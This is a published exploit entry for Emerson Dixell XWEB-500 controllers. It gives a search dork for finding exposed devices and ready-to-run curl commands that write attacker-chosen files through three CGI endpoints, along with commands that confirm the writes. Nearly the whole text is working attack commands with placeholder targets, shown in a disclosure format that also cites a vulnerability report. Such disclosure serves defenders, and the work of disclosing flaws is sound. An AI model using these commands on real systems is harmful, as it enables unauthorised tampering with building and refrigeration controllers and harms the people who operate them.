# Exploit Title: Dixell XWEB-500 - Arbitrary File Write # Google Dork: inurl:"xweb500.cgi" # Date: 03/01/2022 # Exploit Author: Roberto Palamaro # Vendor Homepage: https://climate.emerson.com/it-it/shop/1/dixell-electronics-sku-xweb500-evo-it-it # Version: XWEB-500 # Tested on: Dixell XWEB-500 # References: https://www.swascan.com/vulnerability-report-emerson-dixell-xweb-500-multiple-vulnerabilities/ # Emerson Dixell XWEB-500 is affected by multiple Arbitrary File Write Vulnerability # Endpoint: logo_extra_upload.cgi # Here the first line of the POC is the filename and the second one is the content of the file be written # Write file echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/logo_extra_upload.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -is "http://[target]:[port]/logo/" # Endpoint: lo_utils.cgi # Here ACTION=5 is to enable write mode echo -e "ACTION=5\nfile.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify using ACTION=3 to listing resources echo -e "ACTION=3" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/lo_utils.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Endpoint: cal_save.cgi # Here the first line of the POC is the filename and the second one is the content of the file be written echo -e "file.extension\ncontent" | curl -A Chrome -kis "http://[target]:[port]/cgi-bin/cal_save.cgi" -X POST --data-binary @- -H 'Content-Type: application/octet-stream' # Verify curl -A Chrome -kis http://[target]:[port]/cgi-bin/cal_dir.cgi